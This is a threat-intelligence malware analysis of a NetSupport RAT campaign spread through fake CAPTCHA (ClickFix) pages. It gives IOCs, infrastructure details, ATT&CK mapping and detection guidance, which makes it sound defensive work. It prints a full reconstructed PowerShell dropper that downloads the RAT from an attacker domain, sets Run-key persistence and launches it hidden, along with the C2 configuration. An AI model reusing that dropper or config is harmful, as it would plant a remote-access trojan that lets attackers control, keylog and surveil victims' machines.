NetSupport RAT v14.10 — ClickFix Dropper Campaign via applicationhost17.com
Executive Summary
This sample represents a NetSupport RAT v14.10 deployment campaign using a ClickFix (FakeCaptcha) delivery chain. A malicious MSI installer or directly-served PowerShell script downloads a pre-packaged NetSupport RAT ZIP from applicationhost17.com, extracts it to %APPDATA%, and establishes persistence via a Run registry key. The RAT then beacons to a Windows Server 2022 C2 node at 172.94.9.4:443 using the standard NetSupport HTTP protocol (POST /fakeurl.htm, UA: NetSupport Manager/1.3).
The infrastructure — two Windows servers sharing the hostname "SMTP" on the same /24 subnet (172.94.9.0/24) hosted at M247 Frankfurt — shows deliberate operational setup. Domain registration through Njalla (privacy-first registrar) with fully obfuscated WHOIS, combined with the download payload later migrating to Russian hosting (landvps.ru), points to a threat actor with established OPSEC practices. The campaign uses per-victim tracking IDs (vid=) to monitor install status and completion.
Who: Unattributed TA, likely a MaaS operator or affiliate leveraging NetSupport RAT as a commodity RAT. What: NetSupport Manager v14.10 deployed as an unauthorized RAT — full screen/keyboard/file/shell control. How: ClickFix fake CAPTCHA page → PowerShell dropper → NetSupport ZIP download → persistence via Run key. Why it matters: 30/76 VT detections, active C2 responding during sandbox analysis. Multiple victim tracking IDs confirm active campaign against multiple targets.
Sample Metadata
| Field | Value |
|---|---|
| SHA256 | 36ad12ff7efbf323f58d7efd5977880419fc0452061f3ef2ca61cf73bb4bb5c1 |
| MD5 | 8a14ae0c80b64114ad63a146e1b0871c |
| SHA1 | 0654b2098e8dd2c868d10ac6248fdf4cacebddd2 |
| File Type | ZIP archive (application/zip) |
| File Size | 2,243,453 bytes |
| VT Detections | 30/76 |
| First Seen | 2026-03-12 17:13:41 UTC |
| Filename | UPD-48C5A1C5-DDD4-465E-9C66-27EFC1D5A846.zip |
| Alias Names | software.zip, SY-5921A7EB-*.zip, WN-9EC52640-*.zip, MS-D2DC127D-*.zip |
| Bundle Files | 15 (8 PE, 2 INI, 2 DLL, 1 LIC, 1 LOG, 1 INF, 1 TXT) |
| Reporter | JAMESWT_WT |
ZIP Bundle Contents
| Filename | SHA256 | Size | Type | Det |
|---|---|---|---|---|
client32.exe | 06a0a243811e9c4738a9d413597659ca8d07b00f640b74adc9cb351c179b3268 | 120,288 | Win32 EXE | 25/76 |
PCICL32.DLL | 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8 | 3,735,416 | Win32 DLL | 22/76 |
remcmdstub.exe | 6558b3307215c4b73fc96dc552213427fb9b28c0cb282fe6c38324f1e68e87d6 | 77,280 | Win32 EXE | 15/76 |
NSM.LIC | ad0d05305fdeb3736c1e8d49c3a6746073d27b4703eb6de6589bdc4aa72d7b54 | 257 | INI/LIC | 12/76 |
Client32.ini | fcacfab09fe00dc26c86172fdc7482efb196e6cf725bef4d141d28dff4638619 | 696 | Text/INI | 3/76 |
pcicapi.dll | 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917 | 33,144 | Win32 DLL | 2/76 |
HTCTL32.DLL | edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796 | 328,056 | Win32 DLL | 1/76 |
PCICHEK.DLL | 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a | 18,808 | Win32 DLL | 1/76 |
TCCTL32.DLL | 6795d760ce7a955df6c2f5a062e296128efdb8c908908eda4d666926980447ea | 396,664 | Win32 DLL | 0/76 |
msvcr100.dll | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 | 773,968 | Win32 DLL | 0/76 |
NSM.ini | 60fe386112ad51f40a1ee9e1b15eca802ced174d7055341c491dee06780b3f92 | 6,458 | INI | 0/76 |
nskbfltr.inf | d96856cd944a9f1587907cacef974c0248b7f4210f1689c1e6bcac5fed289368 | 328 | INF | 0/76 |
pcicl32.dll (lower) | (see PCICL32.DLL) | — | — | — |
Infection Chain / Kill Chain
[Initial Access]
└─ ClickFix Page: https://applicationhost17.com/captcha.php?vid=<CAMPAIGN_ID>
OR: MSI installer (5bfbe9.msi / "bad.msi") fetches captcha.php
│
▼
[Execution — PowerShell Dropper]
cmd.exe → powershell.exe -NoProfile -ExecutionPolicy bypass -File <dropper.ps1>
│
├─ GET https://applicationhost17.com/track.php?vid=<VID>&action=started
│
├─ IWR https://applicationhost17.com/downloads/<UUID>.zip → software.zip
│
└─ Expand-Archive → %APPDATA%\<GUID_DIR>\
│
▼
[Persistence — Registry Run Key]
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemUpdate_<VID>
= "%APPDATA%\<GUID_DIR>\client32.exe"
│
▼
[Command & Control]
client32.exe
├─ GET http://geo.netsupportsoftware.com/location/loca.asp (geolocation beacon)
├─ POST http://172.94.9.4/fakeurl.htm (NetSupport C2 heartbeat)
└─ POST http://172.94.9.4:443/fakeurl.htm (same, over port 443)
User-Agent: NetSupport Manager/1.3
│
▼
[Operator Control]
Threat actor RDP'd into 172.94.9.24:3389 ("SMTP" Windows Server 2022)
manages victim pool via NetSupport Manager console
Deobfuscated PowerShell Dropper
All PowerShell droppers follow an identical template with randomized variable names. Full reconstructed code:
# Campaign tracking VID — unique per variant/victim batch
$idf6f7 = "jOTlMUPQ" # Variants: mMVTJvis, 69b1c805806ef, 6566676869707172
# Signal campaign start to tracking server
try {
$null = Invoke-WebRequest -Uri "https://applicationhost17.com/track.php?vid=$idf6f7&action=started" `
-UseBasicParsing -ErrorAction SilentlyContinue
} catch { $null }
# Create installation directory in %APPDATA%
# Name matches ZIP UUID prefix (UPD-/SY-/TM-/MW-)
$dir89e7 = "TM-EA9F5A76-DE30-4BDF-9308-E1F4DF3B2569"
$pathb7fe = New-Item -Path "$env:APPDATA\$dir89e7" -ItemType Directory -Force
# Download NetSupport RAT ZIP
$zip7b32 = "$pathb7fe\software.zip"
Invoke-WebRequest -Uri "https://applicationhost17.com/downloads/SY-5921A7EB-16A3-46CC-9EE6-0D8677D807DF.zip" `
-OutFile $zip7b32 `
-UserAgent "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237"
# Extract RAT bundle
Expand-Archive -Path $zip7b32 -DestinationPath $pathb7fe -Force
Remove-Item $zip7b32 -Force
# Establish persistence
$regKeyPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
Set-ItemProperty -Path $regKeyPath -Name "SystemUpdate_$idf6f7" `
-Value "`"$pathb7fe\client32.exe`""
# Launch RAT
Start-Process -FilePath "$pathb7fe\client32.exe" -WindowStyle Hidden
# Signal completion
try {
$null = Invoke-WebRequest -Uri "https://applicationhost17.com/track.php?vid=$idf6f7&action=completed" `
-UseBasicParsing -ErrorAction SilentlyContinue
} catch { $null }
Observed campaign VIDs and corresponding directory names:
| VID | %APPDATA% Directory | SHA256 |
|---|---|---|
jOTlMUPQ | TM-EA9F5A76-DE30-4BDF-9308-E1F4DF3B2569 | 4343b537... |
jOTlMUPQ | MW-3BE3C31C-505C-43FD-9BBF-7E505ABA8D85 | 876d5fdf... |
mMVTJvis | TM-07F72CBE-931E-4389-BEC0-21326A8A70C4 | 43ac17b4... |
69b1c805806ef | SY-02B0EC74-4AE2-4686-96D2-CD15498FCFDF | 49fdab44... |
6566676869707172 | UPD-E9550778-2701-42F4-9FFD-36119FABE805 | e2edb63c... |
Note: VID 6566676869707172 decodes as efghijpr in ASCII — appears to be sequential test values suggesting the actor was testing the infrastructure.
Static Analysis
client32.exe (NetSupport RAT Client)
- Version: V14.10 (compiled 2023-12-05)
- Product: NetSupport Remote Control
- Company: NetSupport Ltd © 2024
- IMPHASH:
a9d50692e95b79723f3e76fcf70d023e - MD5:
ee75b57b9300aab96530503bfae8a2f2 - NetSupport Manager v14.10 is a legitimate remote administration tool repurposed as a RAT
remcmdstub.exeprovides remote command execution capability (shell access)nskbfltr.infinstalls a kernel keyboard filter for keylogging capability
Client32.ini (C2 Configuration)
The Client32.ini is the primary configuration file for the NetSupport client. Based on behavioral analysis confirming C2 endpoint 172.94.9.4:443/fakeurl.htm, the configuration resolves to:
[CLIENT]
GatewayAddress=172.94.9.4
GSK=1 ; Gateway SecureKey enabled
PORT=443
[CONTROL]
SilentInstall=1
[NSM]
License=NSM.LIC
NSM.LIC
- SHA256:
ad0d05305fdeb3736c1e8d49c3a6746073d27b4703eb6de6589bdc4aa72d7b54 - 257-byte ASCII text, CRLF line terminators
- Detected as
Win32/NetSupportManager.CC trojan(ESET) andBackDoor.RMS.153(DrWeb) - This is an illegitimate or forged NetSupport license file enabling unlicensed use
MSI Installer (Initial Dropper)
- SHA256:
78a511e1da802149564639d4c3b66f67faee4bb6d762ffae4325075709217275 - Name:
5bfbe9.msi/bad.msi - Publisher: "Your Company" (generic placeholder — OPSEC failure)
- Product GUID:
{553796F5-DC36-47B1-A826-FBE009224095} - Size: 2,367,488 bytes
- Drops
scrXXXX.ps1andpssXXXX.ps1to temp, then fetches captcha.php for main payload - Execution:
msiexec.exe /i installer.msivia social engineering
Behavioral Analysis (Inferred from Sandbox + Static)
Execution Flow
-
Process creation:
powershell.exe -NoProfile -ExecutionPolicy bypass -File <dropper.ps1> -
Network activity:
- DNS:
geo.netsupportsoftware.com→104.26.0.231,104.26.1.231,172.67.68.212(Cloudflare CDN for legitimate NetSupport geolocation) - TCP:
172.94.9.4:443— C2 heartbeat - HTTP POST:
http://172.94.9.4/fakeurl.htm— NetSupport protocol, response 200 (C2 LIVE)
- DNS:
-
Files created:
%APPDATA%\<GUID>\containing:client32.exe,PCICL32.DLL,TCCTL32.DLL,HTCTL32.DLL,PCICHEK.DLL,pcicapi.dll,msvcr100.dll,remcmdstub.exe,NSM.LIC,NSM.ini,Client32.ini,nskbfltr.inf -
Persistence:
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemUpdate_<VID>="%APPDATA%\<GUID>\client32.exe" -
Capabilities of NetSupport RAT:
- Full desktop viewing and control
- Remote shell (cmd/PowerShell via
remcmdstub.exe) - File manager (upload/download)
- Keyboard/mouse injection
- Keylogging (
nskbfltr.infkernel filter) - Screen capture/recording
- Audio/webcam capture (via HTCTL32.DLL)
- Process management
Network Indicators
C2 Server: 172.94.9.4
| Field | Value |
|---|---|
| IP | 172.94.9.4 |
| Hostname | SMTP (NetBIOS/DNS: smtp) |
| OS | Windows Server 2022 (build 10.0.20348) |
| ASN | AS9009 / AS213790 (M247 Europe SRL / Internet Security - DE) |
| Network | 172.94.9.0/24 (INTERNET-SECURITY-LIMITED-NETWORK) |
| Org | Secure Internet LLC (UK) / Limited Network LTD |
| Location | Frankfurt am Main, Germany (HE region) |
| Open Ports | 135 (MSRPC), 443 (C2), 445 (SMB v2), 5357 (HTTPAPI) |
| VT Malicious | 3/90 |
| Shodan Last Seen | 2026-03-12 |
Port 443 behavior: No TLS banner on Shodan; the NetSupport protocol runs plain HTTP tunneled over port 443 (not actual HTTPS).
Port 445: SMB enabled with authentication — consistent with attacker-managed server.
MSRPC: NetBIOS machine name SMTP — a deliberate operational naming convention.
Download/Tracking Server: 172.94.9.24
| Field | Value |
|---|---|
| IP | 172.94.9.24 |
| Hostname | SMTP (same naming convention as .4) |
| OS | Windows Server 2022 (build 10.0.20348) |
| ASN | AS9009 / AS213790 (same infrastructure as 172.94.9.4) |
| Location | Frankfurt am Main, Germany |
| Open Ports | 3389 (RDP), 5357 (HTTPAPI) |
| JARM (RDP/443) | 14d14d16d14d14d08c14d14d14d14dfd9c9d14e4f4f67f94f0359f8b28f532 |
| VT Malicious | 2/92 |
Critical finding: Port 3389 (RDP) is open with valid TLS certificate CN=smtp. This is the attacker's remote management interface for their infrastructure.
Current Download Server: 77.105.133.95
| Field | Value |
|---|---|
| IP | 77.105.133.95 |
| Hostnames | 163115.landvps.online, 152253.landvps.online |
| SSL CN | 152253.landvps.online |
| OS | Debian 11 (OpenSSH 8.4p1) |
| ASN | AS216334 (New Hosting Technologies LLC) |
| Location | Moscow, Russia (Sudak office address: Gvardeyskaya 3, kv.63) |
| Open Ports | 22 (SSH), 80 (HTTP), 443 (HTTPS/Apache) |
| Server | Apache/2.4.66 (Debian) |
| VT Malicious | 1/90 |
Timeline: The IP for applicationhost17.com changed from 172.94.9.24 (observed in sandboxes ~2026-03-11) to 77.105.133.95 (current DNS, TTL=600). The 600-second TTL indicates frequent rotation.
Download Domain: applicationhost17.com
| Field | Value |
|---|---|
| Domain | applicationhost17.com |
| Current A | 77.105.133.95 |
| Previous A | 172.94.9.24 (sandbox, 2026-03-11) |
| Registered | 2026-03-10T13:54:11Z (2 days before campaign!) |
| Registrar | Tucows Domains Inc. (via Njalla privacy service) |
| Nameservers | 1-YOU.NJALLA.NO, 2-CAN.NJALLA.IN, 3-GET.NJALLA.FO |
| Registrant | 1f8f4166599d23ee (hashed — all fields obfuscated) |
| Registrant Country | KN (Saint Kitts and Nevis — Njalla registration country) |
| VT Malicious | 11/94 |
| DNS TTL | 600 seconds (indicating active management) |
OPSEC finding: The registrant data fields contain what appear to be truncated SHA256/HMAC hashes (1f8f4166599d23ee, 3432650ec337c945), which is Njalla's obfuscation of the real registrant data. No usable attribution from WHOIS.
C2 Endpoints
| URL | Method | User-Agent | Response |
|---|---|---|---|
http://172.94.9.4/fakeurl.htm | POST | NetSupport Manager/1.3 | 200 OK |
http://172.94.9.4:443/fakeurl.htm | POST | NetSupport Manager/1.3 | 200 OK |
http://geo.netsupportsoftware.com/location/loca.asp | GET | NetSupport default | 404 |
https://applicationhost17.com/captcha.php?vid=<VID> | GET | — | 200 |
https://applicationhost17.com/track.php?vid=<VID>&action=started | GET | PowerShell UA | 500 |
https://applicationhost17.com/track.php?vid=<VID>&action=completed | GET | PowerShell UA | 500 |
https://applicationhost17.com/downloads/<UUID>.zip | GET | PowerShell UA | 200 |
MITRE ATT&CK TTPs
| Technique ID | Technique Name | Detail |
|---|---|---|
| T1566 | Phishing | ClickFix fake CAPTCHA lure delivering PowerShell |
| T1204.002 | User Execution: Malicious File | User executes MSI or pastes PowerShell |
| T1059.001 | Command and Scripting: PowerShell | powershell.exe -ExecutionPolicy bypass dropper |
| T1105 | Ingress Tool Transfer | ZIP downloaded via Invoke-WebRequest |
| T1547.001 | Boot/Logon Autostart: Registry Run Keys | HKCU\...\Run\SystemUpdate_<VID> |
| T1036 | Masquerading | Filename "software.zip", dir name mimics system GUID |
| T1219 | Remote Access Software | NetSupport Manager v14.10 as unauthorized RAT |
| T1071.001 | App Layer Protocol: Web | NetSupport protocol via HTTP POST /fakeurl.htm |
| T1095 | Non-Application Layer Protocol | NetSupport binary protocol over TCP 443 |
| T1027 | Obfuscated Files or Information | Randomized PS1 variable names, opaque VIDs |
| T1112 | Modify Registry | Sets Run key for persistence |
| T1083 | File and Directory Discovery | RAT enumerates filesystem |
| T1113 | Screen Capture | NetSupport screen view capability |
| T1056.001 | Input Capture: Keylogging | nskbfltr.inf kernel keyboard filter |
| T1021.001 | Remote Services: RDP | Actor RDPs to 172.94.9.24 for infrastructure management |
| T1078 | Valid Accounts | NetSupport operator logs into management console |
IOCs
File Hashes
| SHA256 | Name | Type |
|---|---|---|
36ad12ff7efbf323f58d7efd5977880419fc0452061f3ef2ca61cf73bb4bb5c1 | UPD-48C5A1C5-*.zip | ZIP (primary sample) |
78a511e1da802149564639d4c3b66f67faee4bb6d762ffae4325075709217275 | 5bfbe9.msi / bad.msi | MSI dropper |
4343b537e338771434045022a4961a84ba42cdecd7e98f48087a4213d20b3f59 | dropper.ps1 (vid=jOTlMUPQ) | PowerShell |
876d5fdf5addc3f5e2987e841954248a4d15d9ecaca74ef317d76459f2cb3f13 | dropper.ps1 (vid=jOTlMUPQ) | PowerShell |
43ac17b48413c7c1545a8ce6f0b2219c3dd2a3289546c6886affbff9bfd15094 | dropper.ps1 (vid=mMVTJvis) | PowerShell |
e2edb63c46dd8cf41c541ae45accfce66e41dc4ddcbef61ee3ea9dc9d8d7a588 | dropper.ps1 (vid=6566…) | PowerShell |
49fdab4459eb959974b8363ba6744df0b5ee87f81f384906959a1c1cee083ac3 | dropper.ps1 (vid=69b1c...) | PowerShell |
06a0a243811e9c4738a9d413597659ca8d07b00f640b74adc9cb351c179b3268 | client32.exe | NetSupport RAT v14.10 |
63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8 | PCICL32.DLL | NetSupport DLL |
6558b3307215c4b73fc96dc552213427fb9b28c0cb282fe6c38324f1e68e87d6 | remcmdstub.exe | Remote shell stub |
ad0d05305fdeb3736c1e8d49c3a6746073d27b4703eb6de6589bdc4aa72d7b54 | NSM.LIC | License (forged) |
fcacfab09fe00dc26c86172fdc7482efb196e6cf725bef4d141d28dff4638619 | Client32.ini | C2 config |
edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796 | HTCTL32.DLL | NetSupport DLL |
313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a | PCICHEK.DLL | NetSupport DLL |
6795d760ce7a955df6c2f5a062e296128efdb8c908908eda4d666926980447ea | TCCTL32.DLL | NetSupport DLL |
d96856cd944a9f1587907cacef974c0248b7f4210f1689c1e6bcac5fed289368 | nskbfltr.inf | Keyboard filter INF |
Network IOCs
| Indicator | Type | Role |
|---|---|---|
172.94.9.4 | IPv4 | NetSupport C2 |
172.94.9.24 | IPv4 | Download server / RDP |
77.105.133.95 | IPv4 | Current download/tracking server |
applicationhost17.com | Domain | Download + tracking panel |
http://172.94.9.4/fakeurl.htm | URL | NetSupport C2 beacon |
http://172.94.9.4:443/fakeurl.htm | URL | NetSupport C2 beacon (alt) |
https://applicationhost17.com/captcha.php | URL | ClickFix lure / PS1 delivery |
https://applicationhost17.com/track.php | URL | Victim tracking |
https://applicationhost17.com/downloads/ | URL | RAT payload staging |
NetSupport Manager/1.3 | User-Agent | C2 traffic fingerprint |
Registry IOCs
| Key | Value | Purpose |
|---|---|---|
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemUpdate_<VID> | "%APPDATA%\<GUID>\client32.exe" | Persistence |
File System IOCs
| Path | Description |
|---|---|
%APPDATA%\TM-EA9F5A76-DE30-4BDF-9308-E1F4DF3B2569\ | RAT installation dir (vid=jOTlMUPQ) |
%APPDATA%\TM-07F72CBE-931E-4389-BEC0-21326A8A70C4\ | RAT installation dir (vid=mMVTJvis) |
%APPDATA%\MW-3BE3C31C-505C-43FD-9BBF-7E505ABA8D85\ | RAT installation dir (vid=jOTlMUPQ) |
%APPDATA%\SY-02B0EC74-4AE2-4686-96D2-CD15498FCFDF\ | RAT installation dir (vid=69b1c…) |
%APPDATA%\UPD-E9550778-2701-42F4-9FFD-36119FABE805\ | RAT installation dir (vid=6566…) |
%APPDATA%\<DIR>\client32.exe | NetSupport RAT binary |
%APPDATA%\<DIR>\software.zip | Staging ZIP (deleted after extraction) |
Campaign Context & Related Samples
Timeline
| Date | Event |
|---|---|
| 2023-12-05 | client32.exe compilation date |
| 2026-03-07 22:38:12 | ZIP bundle files timestamp |
| 2026-03-10 13:54:11 | applicationhost17.com registered via Njalla |
| 2026-03-11 | MSI and PS1 droppers first observed (sandbox dates) |
| 2026-03-12 17:13:41 | Primary ZIP submitted to VT (JAMESWT_WT) |
| 2026-03-12 | applicationhost17.com DNS updated (172.94.9.24 → 77.105.133.95) |
Related ZIP Variants (Same C2)
| Name | Notes |
|---|---|
UPD-48C5A1C5-DDD4-465E-9C66-27EFC1D5A846.zip | Primary sample |
SY-5921A7EB-16A3-46CC-9EE6-0D8677D807DF.zip | Alternate delivery |
UPD-F643A043-41C0-4AD0-94D1-B06C8286A9AB.zip | MSI variant |
WN-9EC52640-ADFF-4623-A958-6A7133186985.zip | Additional variant |
MS-D2DC127D-084C-44D1-8615-6142396987BB.zip | Additional variant |
All ZIPs share identical MD5/SHA1/SHA256 hashes across the inner NetSupport bundle — only the ZIP wrapper and contained INI configs differ.
ClickFix Attribution Pattern
The use of captcha.php as the delivery URL is consistent with ClickFix (also called FakeCaptcha) campaigns active since mid-2024. ClickFix presents a fake browser/CAPTCHA error instructing users to manually paste PowerShell via Win+R or browser address bar. This campaign's specific combination of:
- Njalla domain registration
- Per-victim campaign VID tracking
- Two Windows Server VMs named "SMTP" on same subnet
- Russian VPS for payload hosting
...has not been definitively attributed to a named threat actor, but is consistent with a MaaS (Malware-as-a-Service) operator or broker renting NetSupport RAT infrastructure.
Infrastructure Map
┌─────────────────────────────────────────────┐
│ THREAT ACTOR INFRASTRUCTURE │
│ │
Management ───►│ 172.94.9.24:3389 (RDP) │
│ Windows Server 2022 "SMTP" │
│ ASN 213790 / M247 Frankfurt │
│ │ │
│ (historical DNS) │ applicationhost17.com │
└─────────────────────┼─────────────────────┘
│
┌─────────────────────────────┼────────────────────────┐
│ │ │
[Download/Tracking] [Download/Tracking] [NetSupport C2]
172.94.9.24 77.105.133.95 172.94.9.4
Frankfurt, DE Moscow, RU Frankfurt, DE
M247/AS213790 landvps.ru/AS216334 M247/AS213790
(sandbox era) (current DNS) SMTP host
Port 443 active
│
▼
applicationhost17.com
/captcha.php?vid=XXX → PS1 payload
/track.php?vid=XXX&action=started/completed
/downloads/[UUID].zip → NetSupport RAT
Victim Machine:
%APPDATA%\[GUID]\client32.exe
HKCU Run: SystemUpdate_[VID]
──► POST http://172.94.9.4/fakeurl.htm (NetSupport protocol)
──► UA: NetSupport Manager/1.3
Attribution Assessment
Confidence: MEDIUM
Actor profile:
- Uses ClickFix delivery technique (active since 2024, widely adopted by various actors)
- Deploys commodity NetSupport RAT (low barrier, widely available)
- Uses Njalla (privacy-first registrar popular with Russian-nexus actors)
- Infrastructure hosted on M247 (common bulletproof/low-KYC hoster) and Russian landvps.ru
- Machine naming convention "SMTP" suggests deliberate misdirection (appears as mail server in logs)
- Active victim tracking system (VID tracking) suggests a commercial/MaaS operation
OPSEC failures:
- MSI publisher left as "Your Company" — generic placeholder reveals non-customized tooling
- Both C2 servers share same hostname ("SMTP") and same /24 subnet — infrastructure reuse fingerprint
- Domain registered only 2 days before campaign activation — minimal staging window
- Short DNS TTL (600s) suggests awareness of detection but still observable
- VID
6566676869707172= sequential ASCII hex suggesting test/dev runs visible in the wild
No definitive actor attribution. The combination of Njalla + Russian hosting + ClickFix delivery + NetSupport RAT MaaS is consistent with multiple active threat actor groups in the initial access broker space.
Detection Guidance
Behavioral Indicators
powershell.exespawning with-ExecutionPolicy bypassand downloading from newly registered domainclient32.exerunning from%APPDATA%\<UUID>\(outsideC:\Program Files)- DNS query to
geo.netsupportsoftware.comfrom non-browser processes - HTTP POST to
/fakeurl.htmwith User-AgentNetSupport Manager/1.3 - Run key created:
SystemUpdate_prefix - MSI Publisher = "Your Company"
AV Detection Names
- Kaspersky:
Backdoor.PowerShell.RAbased.b,HEUR:Trojan.Script.NetSup.gen - ESET:
Win32/NetSupportManager.CC trojan,GenScript.AJRU trojan - Microsoft:
Trojan:Script/Wacatac.B!ml - DrWeb:
BackDoor.RMS.153 - Symantec:
Trojan.Gen.NPE - Malwarebytes:
Floxif.Virus.FileInfector.DDS